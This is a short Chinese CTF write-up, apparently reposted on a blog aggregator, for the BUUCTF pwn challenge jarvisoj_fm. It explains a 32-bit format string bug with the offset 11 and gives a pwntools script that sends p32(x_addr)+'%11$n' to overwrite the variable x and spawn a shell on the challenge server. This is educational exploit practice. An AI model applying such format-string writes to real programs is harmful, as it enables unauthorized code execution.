当前位置:
首页 >
BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
发布时间:2025/3/20
35
豆豆
生活随笔
收集整理的这篇文章主要介绍了
BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞
小编觉得挺不错的,现在分享给大家,帮大家做个参考.
简单的格式化字符串漏洞题目
32位,开启了canary和nx保护
知道以上条件就可以计算偏移了
得到偏移为11
from pwn import *r=remote('node3.buuoj.cn',25582) x_addr=0x804A02Cpayload=p32(x_addr)+"%11$n"r.sendline(payload)r.interactive()payload=p32(x_addr)+"%11$n"
因为要使x的值为4,写入的数据由%11$n前面的参数的长度决定,而p32(x_addr),正好是4位,不需要添a来补齐位数就可以直接利用,将x参数的地址的值改成了4,获取了shell
总结
以上是生活随笔为你收集整理的BUUCTF(pwn)jarvisoj_fm --格式化字符串漏洞的全部内容,希望文章能够帮你解决所遇到的问题。
- 上一篇: fastbin attack攻击中关于
- 下一篇: buuctf(misc) FLAG [L